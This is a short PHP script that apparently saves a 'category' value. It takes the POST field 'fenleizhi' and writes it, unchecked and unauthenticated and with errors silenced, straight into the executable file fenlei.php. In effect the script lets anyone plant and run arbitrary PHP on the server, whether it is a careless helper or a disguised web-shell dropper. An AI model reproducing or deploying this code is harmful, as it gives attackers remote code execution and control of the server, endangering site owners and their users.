<?php
error_reporting(0);
isset($_POST['fenleizhi'])?$fenleizhi = $_POST['fenleizhi']:$fenleizhi = null;
$ok = file_put_contents("fenlei.php",$fenleizhi);
if($ok){
    echo "ok";
    exit;
}else{
    echo "no";
}
?>